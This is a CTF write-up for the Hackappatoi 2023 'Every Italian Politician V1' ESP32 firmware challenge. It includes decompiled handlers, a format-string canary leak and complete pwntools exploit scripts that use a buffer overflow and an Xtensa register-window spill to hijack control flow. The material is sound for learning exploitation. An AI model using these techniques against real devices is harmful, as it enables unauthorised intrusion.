Every Italian Politician V1

This was a really fun pwn challenge from the 2023 iteration of Hackappatoi CTF. It involved reversing a custom ESP32 firmware, and leveraging both a format string vulnerability and a buffer overflow. The handout contains both the .elf and the raw .bin firmware image. The ESP32 familiy of microcontrollers usually employs a Tensilica Xtensa microprocessor; this was also the case in this challenge, as we can easily notice from the two scripts run_dbg.sh and run_prod.sh:

# run_dbg.sh

#!/bin/bash
setsid qemu-system-xtensa -cpu esp32 -M esp32 -m 4M -drive file=flash.bin,if=mtd,format=raw -nic user,model=open_eth,hostfwd=tcp::80-:80 -s &
qemu_pid=$!
sleep 5
/root/.espressif/tools/xtensa-esp-elf-gdb/12.1_20221002/xtensa-esp-elf-gdb/bin/xtensa-esp32-elf-gdb /root/every-italian-politician.elf -ex "target remote:1234"
kill -9 $qemu_pid


# run_prod.sh

#!/bin/bash
while true
do
    qemu-system-xtensa -cpu esp32 -M esp32 -m 4M -drive file=flash.bin,if=mtd,format=raw -nic user,model=open_eth,hostfwd=tcp::80-:80 &
    qemu_pid=$!
    sleep 20
    kill -9 $qemu_pid
done

These are used for debugging and testing, by emulating the target architecture using qemu.

The first step is understanding how to reverse the firmware. Few tools support Xtensa out of the box, but luckily there exists a processor module for Ghidra (located here. This is actually a fork of the original repo that implements support for Ghidra 10.x). With this out of the way, it’s time to actually look at the code. The binary seems to implement a simple HTTP server using the Espressif IoT Development Framework. With some digging around, one can notice an interesting get_handler function:

undefined4 get_handler(undefined4 param_1)

{
  uint uVar1;
  int iVar2;
  char *pcVar3;
  uint auStack_24 [9];
  
  req_glob = param_1;
  iVar2 = httpd_req_get_hdr_value_len(param_1,s_parrot_3f404454);
  uVar1 = iVar2 + 1;
  buf_len = uVar1;
  if (uVar1 < 2) {
    iVar2 = httpd_req_get_hdr_value_len(param_1,s_super-secret_3f40445c);
    uVar1 = iVar2 + 1;
    buf_len = uVar1;
    if (uVar1 < 2) {
      httpd_resp_send(param_1,s_Welcome_to_the_Italian_Parliamen_3f404470,0xffffffff);
    }
    else {
      buf = (char *)valloc(uVar1);
      iVar2 = httpd_req_get_hdr_value_str(param_1,s_super-secret_3f40445c,buf,uVar1);
      if (iVar2 == 0) {
        sscanf(buf,&DAT_3f40446c,auStack_24,uVar1);
        if (auStack_24[0] < 0x4e) {
          secret(auStack_24[0],&DAT_3f40446c,auStack_24,uVar1);
        }
        else {
          secret(1,&DAT_3f40446c,auStack_24,uVar1);
        }
        httpd_resp_send(req_glob,parrot1,0xffffffff,uVar1);
      }
      free(buf);
    }
  }
  else {
    pcVar3 = (char *)valloc(uVar1);
    buf = pcVar3;
    iVar2 = httpd_req_get_hdr_value_str(param_1,s_parrot_3f404454,pcVar3,uVar1);
    if (iVar2 == 0) {
      parrot(0,s_parrot_3f404454,pcVar3,uVar1);
      httpd_resp_send(req_glob,parrot1,0xffffffff,uVar1);
    }
    free(buf);
  }
  return 0;
}

The code is pretty straightforward: it firstly checks that the length of the header parrot is non-zero. If it isn’t, it saves it in a buffer, passes it to the the parrot function (more on it later), and returns an HTTP response with the content of parrot1 in it. If the headers is not set, the program performs another series of checks. It makes the same one on the length, but this time on the super-secret header. If its value length is non-zero, it extracts the first numerical value in it with sscanf. It it’s less than 0x4e, it passes it as the first argument for the secret function (more on this later too), otherwise calls it with 1 as first parameter, and then sends an HTTP response as before. Okay, this was the easy part. Now let’s dive into the specifics of what parrot and secret actually do. It seemed logical to start from secret given its name:

int secret(int param_1)

{
  if (param_1 == 0) {
    vuln();
  }
  else {
    secret(param_1 + -1);
  }
  return param_1;

From this, it already seems clear that we can construct our initial payload so that param_1 == 0 is true. The actual vuln code is:

int vuln(void)
{
  int iVar1;
  undefined4 uVar2;
  int local_6c;
  undefined4 local_64;
  undefined auStack_60 [60];
  int local_24;
  
  iVar1 = buf;
  memw();
  memw();
  local_24 = __stack_chk_guard;
  local_6c = 0;
  local_64 = 0;
  uVar2 = memset(auStack_60,0,0x3c);
  for (; *(char *)(iVar1 + local_6c) != '\0'; local_6c = local_6c + 1) {
    auStack_60[local_6c + -4] = *(undefined *)(iVar1 + local_6c);
  }
  memw();
  memw();
  if (local_24 != __stack_chk_guard) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail(uVar2,0,0x3c);
  }
  return __stack_chk_guard;
}

Well, this seems like a classical buffer overflow. Here we don’t have any constraints on the length of the payload since it keeps reading until it gets a null byte. That canary check is annoying though. Luckily for us, __stack_chk_guard is global, meaning that it will be the same also for other functions. Let’s look at the parrot function:

int parrot(void)
{
  undefined4 uVar1;
  undefined1 *puVar2;
  int iVar3;
  undefined4 uStack_34;
  undefined4 uStack_30;
  undefined4 uStack_2c;
  undefined4 uStack_28;
  int iStack_24;
  
  memw();
  memw();
  iStack_24 = __stack_chk_guard;
  uStack_34 = 0;
  uStack_30 = 0;
  uStack_2c = 0;
  uStack_28 = 0;
  puVar2 = parrot1;
  memcpy(parrot1,s_I'm_an_italian_politician!_I_rep_3f404400,0x52);
  uVar1 = buf;
  strncpy(&uStack_34,buf,5);
  iVar3 = strlen(puVar2,uVar1,5);
  iVar3 = sprintf(puVar2 + iVar3,(char *)&uStack_34,5);
  memw();
  memw();
  if (iStack_24 != __stack_chk_guard) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail(iVar3,&uStack_34,5);
  }
  return __stack_chk_guard;
}

This just copies the user input back into the buffer that will be returned with the http response, alongside some other text. Taking a closer look at sprintf(puVar2 + iVar3,(char *)&uStack_34,5), we can notice that we control uStack_34, the format specifier. Thanks to this, we can perform a format string attack and leak the canary (more on this here). There is a problem tho: the canary is kinda high in the stack, hence we would need a long format string in the form of %p%p%p... to leak it, but the call to strncpy(&uStack_34,buf,5) gives us only 5 bytes. Thankfully, this is not really a problem, since we can specify the number of the argument to print with the format %n$. Thus, after some trial and error, we are able to leak the canary with the following script:

from pwn import *

r = remote("localhost", 8080)

while True:
    try:
        r = remote("localhost", 8080)
        r.send(b"GET / HTTP/1.1\r\nparrot: %12$d\r\n\r\n")
        r.recvuntil("something!\n").decode()
        canary = int(r.recv(timeout=1).decode().strip())
        canary = canary & 0xffffffff

Ok, we’ve got the canary. It’s time to go back to secret. Before crafting the remaining part of the exploit, we need to decide where to actually jump to in the code. The win functions seems like a good candidate:

undefined * win(undefined *param_1)

{
  undefined *puVar1;
  
  puVar1 = flag;
  if (param_1 != flag) {
    httpd_resp_send();
  }
  return puVar1;
}

At first glance, it should be enough to jump to its entry point, 0x400d71d0. This gives us another problem to solve: when packed as a p32, this address results in \xd0q\r@. The carriage return can’t be present in our payload, since it will break the whole HTTP request. I’m pretty sure the author noticed this, since the win function contains a huge nop sled that ends when the corresponding address doesn’t contain \r anymore when packed. Nice, now it’s time to wrap it up. Before going into the next section there is some reading to do, or else it won’t make any sense. This and this helped me tremendously in understanding what was going on. The takeaway points are two:

we have to deal with windowed registers
stack layout is kinda weird

I won’t go in detail about these, since the resources I linked already do a great job at explaining it. The thing that interests us is: the return address is not stored on the stack, but in the register a0. At first this seems like a real problem: if the return address is not on the stack, then we can’t overwrite it. Well, that’s only half the truth. In fact, if a window overflow exception occurs (really, read those posts) it happens that registers get saved onto the stack, and then restored at the proper time. This is exactly the scenario we are in, and thus we are able to overwrite not the current function’s return address, but the one of the callee function: the control flow will be hijacked at restoration time. Leveraging this last thing, our exploit is the following (note that the ret address is not 0x400e2d2e but 0x800e2d2e since the two topmost bits indicate how much the registry window must be rotated of):

from pwn import *

while True:
    try:
        r = remote("92.246.89.201", 10004)
        r.send(b"GET / HTTP/1.1\r\nparrot: %12$d\r\n\r\n")
        r.recvuntil("something!\n")
        canary = int(r.recv(timeout=1).decode().strip())
        canary = canary & 0xffffffff
        ret_addr = 0x800e2d2e
        r.send(b"GET / HTTP/1.1\r\nsuper-secret: 0" + b"a" * 63 + p32(canary) + b"a"*48 + p32(ret_addr) + b"\r\n\r\n")
        r.interactive()
        break
    except Exception as e:
        r.close()
        continue

and here’s our flag: hctf{c0rrupt10n_c0rrupt10n_3v3rywh3r3}

untrue.me

Every Italian Politician V1

Untrue